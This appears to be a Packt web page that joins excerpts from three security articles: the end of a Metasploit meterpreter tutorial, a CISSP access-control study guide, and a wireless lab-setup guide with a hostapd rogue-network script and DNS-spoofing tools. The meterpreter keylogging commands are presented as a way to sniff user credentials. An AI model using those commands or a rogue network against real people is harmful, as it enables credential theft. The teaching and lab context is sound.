By now we have covered the core commands, system commands, networking commands, and filesystem commands. The last part of the stdapi command set is the user-interface commands. The most commonly used of these are the keylogging commands, which are very effective for sniffing user account credentials:

Syntax: meterpreter> keyscan_start
Syntax: meterpreter> keyscan_dump
Syntax: meterpreter> keyscan_stop

This is the procedure for the usage of these commands. The following screenshot explains the commands in action:

The communication between meterpreter and its targets is done via type-length-value (TLV) packets, and the data is transferred in an encrypted manner. This design allows multiple channels of communication, with the advantage that multiple programs can communicate with the attacker. The creation of channels is illustrated in the following screenshot:

The syntax for this command is as follows:

meterpreter> execute process_name -c

-c is the parameter that tells meterpreter to channel the input/output. When the attack requires us to interact with multiple processes, the concept of channels comes in handy as a tool for the attacker. The close command is used to exit a channel.

Summary

In this article, we learned what Metasploit is and also saw some of its top features.

Resources for Article:

Further resources on this subject:

- Understanding the True Security Posture of the Network Environment being Tested [Article]
- Preventing Remote File Includes Attack on your Joomla Websites [Article]
- Tips and Tricks on BackTrack 4 [Article]

CISSP: Security Measures for Access Control

Packt
27 Nov 2009
4 min read
Knowledge requirements

A candidate appearing for the CISSP exam should have knowledge in the following areas that relate to access control:

- Control access by applying concepts, methodologies, and techniques
- Identify, evaluate, and respond to access control attacks such as brute force attacks, dictionary attacks, spoofing, denial of service, and so on
- Design, coordinate, and evaluate penetration test(s)
- Design, coordinate, and evaluate vulnerability test(s)

The approach

In accordance with the knowledge expected in the CISSP exam, this domain is broadly grouped into five sections as shown in the following diagram:

- Section 1: The Access Control domain consists of many concepts, methodologies, and some specific techniques that are used as best practices. This section covers some of the basic concepts, access control models, and a few examples of access control techniques.
- Section 2: Authentication processes are critical for controlling access to facilities and systems. This section looks into important concepts that establish the relationship between access control mechanisms and authentication processes.
- Section 3: A system or facility becomes compromised primarily through unauthorized access, either through the front door or the back door. We'll see some of the common and popular attacks on access control mechanisms, and also learn about the prevalent countermeasures to such attacks.
- Section 4: An IT system consists of operating system software, applications, and embedded software in devices, to name a few. Vulnerabilities in such software are nothing but holes or errors. In this section we see some of the common vulnerabilities in IT systems, vulnerability assessment techniques, and vulnerability management principles.
- Section 5: Vulnerabilities are exploitable, in the sense that IT systems can be compromised and unauthorized access can be gained by exploiting them. Penetration testing, or ethical hacking, is an activity that tests the exploitability of vulnerabilities for gaining unauthorized access to an IT system.

Today, we'll quickly review some of the important concepts in Sections 1, 2, and 3.

Access control concepts, methodologies, and techniques

Controlling access to information systems and information processing facilities by means of administrative, physical, and technical safeguards is the primary goal of the access control domain. The following topics provide insight into some of the important access control related concepts, methodologies, and techniques.

Basic concepts

One of the primary concepts in access control is to understand the subject and the object. A subject may be a person, a process, or a technology component that either seeks access or controls the access. For example, an employee trying to access his business email account is a subject. Similarly, the system that verifies the credentials, such as username and password, is also termed a subject. An object can be a file, data, physical equipment, or premises which need controlled access. For example, the email stored in the mailbox is an object that a subject is trying to access. Controlling access to an object by a subject is the core requirement of an access control process and its associated mechanisms. In a nutshell, a subject either seeks or controls access to an object, as the short sketch below illustrates.
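To make the subject and object relationship concrete, here is a small, illustrative Python sketch of an access decision. The permission matrix, subjects, and objects are invented for illustration and are not part of the CISSP material itself.

# A toy access control matrix: object -> {subject: set of allowed actions}
PERMISSIONS = {
    "mailbox:alice": {"alice": {"read", "write"}, "mail-daemon": {"write"}},
    "payroll.xlsx": {"hr-app": {"read"}},
}

def is_allowed(subject: str, action: str, obj: str) -> bool:
    # Return True if the subject may perform the action on the object.
    return action in PERMISSIONS.get(obj, {}).get(subject, set())

# The subject 'alice' seeks access to the object 'mailbox:alice'
print(is_allowed("alice", "read", "mailbox:alice"))   # True
print(is_allowed("alice", "read", "payroll.xlsx"))    # False - access denied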
An access control mechanism can be classified broadly into the following two types (a short sketch contrasting them follows the list):

- Context-dependent access control: If access to an object is controlled based on certain contextual parameters, such as location, time, sequence of responses, access history, and so on, then it is known as context-dependent access control. In this type of control, the value of the asset being accessed is not a primary consideration. Providing the username and password combination followed by a challenge-and-response mechanism such as CAPTCHA, filtering access based on MAC addresses in wireless connections, or a firewall filtering data based on packet analysis are all examples of context-dependent access control mechanisms. Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) is a challenge-response test to ensure that the input to an access control system is supplied by humans and not by machines. This mechanism is predominantly used by web sites to prevent Web Robots (WebBots) from accessing the controlled sections of the web site by brute force methods. The following is an example of CAPTCHA:
- Content-dependent access control: If access is provided based on the attributes or content of an object, then it is known as content-dependent access control. In this type of control, the value and attributes of the content being accessed determine the control requirements. For example, hiding or showing menus in an application, views in databases, and access to confidential information are all content-dependent.
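The distinction between the two types is easier to see in code. The following minimal Python sketch contrasts a context-dependent check, where the decision depends on when and from where the request arrives, with a content-dependent check, where the decision depends on an attribute of the object itself. The MAC allowlist, office hours, and sensitivity labels are invented placeholders.

from datetime import datetime

ALLOWED_MACS = {"00:11:22:33:44:55"}          # placeholder allowlist
OFFICE_HOURS = range(8, 18)                   # 08:00 to 17:59

def context_dependent_allow(source_mac: str, now: datetime) -> bool:
    # Decision based purely on context (who, where, when), not on the asset's value.
    return source_mac in ALLOWED_MACS and now.hour in OFFICE_HOURS

def content_dependent_allow(subject_clearance: str, document: dict) -> bool:
    # Decision based on an attribute of the object: its sensitivity label.
    order = ["public", "internal", "confidential"]
    return order.index(subject_clearance) >= order.index(document["sensitivity"])

# Example usage with placeholder data
print(context_dependent_allow("00:11:22:33:44:55", datetime(2024, 1, 8, 9, 30)))  # True
print(content_dependent_allow("internal", {"name": "salaries", "sensitivity": "confidential"}))  # False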

Wireless and Mobile Hacks

Packt
22 Jul 2014
6 min read
(For more resources related to this topic, see here.)

So I don't think it's possible to go to a conference these days and not see a talk on mobile or wireless. (They tend to schedule the streams to have both mobile and wireless talks at the same time; the sneaky devils. There is no escaping the wireless knowledge!) So, it makes sense that we work out some ways of training people to skill up on these technologies. We're going to touch on some older vulnerabilities that you don't see very often, but as always, when you do, it's good to know how to insta-win.

Wireless environment setup

This article is a bit of an odd one, because with Wi-Fi and mobile, it's much harder to create a safe environment for your testers to work in. For infrastructure and web app tests, you can simply say, "it's on the network, yo" and they'll get the picture. However, Wi-Fi and mobile devices are almost everywhere in places that require pen testing. It's far too easy for someone to get confused and attempt to pwn a random bystander. While this sounds hilarious, it is a serious issue if that occurs. So, adhere to the following guidelines for safer testing:

- Where possible, try and test away from other people and networks. If there is an underground location nearby, testing becomes simpler, as floors are more effective than walls for blocking Wi-Fi signals (contrary to the firmly held beliefs of anyone who's tried to improve their home network signal). If you're an individual who works for a company, or, you know, has the money to make a Faraday cage, then by all means do the setup in there. I'll just sit here and be jealous.
- Unless it's pertinent to the test scenario, provide testers with enough knowledge to identify the devices and networks they should be attacking. A good way to go is to provide the MAC address, as they very rarely collide. (MAC randomizing tools be damned.)
- If an evil network has to be created, name it something obvious and reduce the access to ensure that it is visible to as few people as possible. The naming convention we use is Connectingtomewillresultin followed by pain, death, and suffering. While this steers away the majority of people, it does appear to attract the occasional fool, but that's natural selection for you.
- Once again, but it is worth repeating, don't use your home network. Especially in this case, using your home equipment could expose you to random passersby or evil neighbors. I'm pretty sure my neighbor doesn't know how to hack, but if he does, I'm in for a world of hurt.

Software

We'll be using Kali Linux as the base for this article, as we'll be using the tools provided by Kali to set up our networks for attack. Everything you need is built into Kali, but if you happen to be using another build such as Ubuntu or Debian, you will need the following tools:

- Iwtools (apt-get install iw): This is the wireless equivalent of ifconfig that allows the alteration of wireless adapters, and provides a handy method to monitor them.
- Aircrack suite (apt-get install aircrack-ng): The basic tools of wireless attacking are available in the Aircrack suite. This selection of tools provides a wide range of services, including cracking encryption keys, monitoring probe requests, and hosting rogue networks.
- Hostapd (apt-get install hostapd): Airbase-ng doesn't support WPA2 networks, so we need to bring in the serious programs for serious people. This can also be used to host WEP networks, but getting Aircrack suite practice is not to be sniffed at.
- Wireshark (apt-get install wireshark): Wireshark is one of the most widely used network analysis tools. It's not only used by pen testers, but also by people who have CISSP and other important letters after their names. This means that it's a tool that you should know about.
- dnschef (https://thesprawl.org/projects/dnschef/): Thanks to Duncan Winfrey, who pointed me in this direction. DNSChef is a fantastic resource for doing DNS spoofing. Other alternatives include dnsspoof and Metasploit's FakeDNS.
- Crunch (apt-get install crunch): Crunch generates strings in a specified order. While it seems very simple, it's incredibly useful. Use it with care though; it has filled more than one unwitting user's hard drive.

Hardware

You want to host a dodgy network. The first question to ask yourself, after the question you already asked yourself about software, is: is your laptop/PC capable of hosting a network? If your adapter is compatible with injection drivers, you should be fine. A quick check is to boot up Kali Linux and run sudo airmon-ng start <interface>. This will put your adapter into monitor mode. If you don't have the correct drivers, it'll throw an error. Refer to a potted list of compatible adapters at http://www.aircrack-ng.org/doku.php?id=compatibility_drivers.

However, if you don't have access to an adapter with the required drivers, fear not. It is still possible to set up some of the scenarios. There are two options. The first and most obvious is "buy an adapter." I can understand that you might not have a lot of cash kicking around, so my advice is to pick up an Edimax ew-7711-UAN; it's really cheap and pretty compact. It has a short range and is fairly low powered. It is also compatible with Raspberry Pi and BeagleBone, which is awesome but irrelevant.

The second option is a limited solution. Most phones on the market can be used as wireless hotspots and so can be used to set up profiles for other devices for the phone-related scenarios in this article. Unfortunately, unless you have a rare and epic phone, it's unlikely to support WEP, so that's out of the question. There are solutions for rooted phones, but I wouldn't instruct you to root your phone, and I'm most certainly not providing a guide to do so. Realistically, in order to create spoofed networks effectively and set up these scenarios, a computer is required. Maybe I'm just not being imaginative enough. Once you do have a compatible adapter, a minimal sketch of hosting a test network with hostapd follows below.
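As mentioned above, here is a minimal, illustrative sketch of hosting a WPA2 test network with hostapd from Python. It assumes a Kali-like system with hostapd installed, an adapter whose driver supports AP mode, and root privileges; the interface name, SSID, channel, and passphrase are placeholders that you should change to match your own isolated lab.

import subprocess
import tempfile

# Placeholder values; change these to match your own lab setup.
HOSTAPD_CONF = """
interface=wlan0
driver=nl80211
ssid=Connectingtomewillresultinpain
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=CorrectHorseBatteryStaple
rsn_pairwise=CCMP
"""

def start_test_ap() -> None:
    # Write a throwaway hostapd config and run it in the foreground (Ctrl+C to stop).
    with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as conf:
        conf.write(HOSTAPD_CONF)
        path = conf.name
    # hostapd takes the configuration file as its argument; requires root.
    subprocess.run(["hostapd", path], check=False)

if __name__ == "__main__":
    start_test_ap()

Keeping the SSID in line with the naming convention above makes it obvious to bystanders that this is a training network they should stay away from.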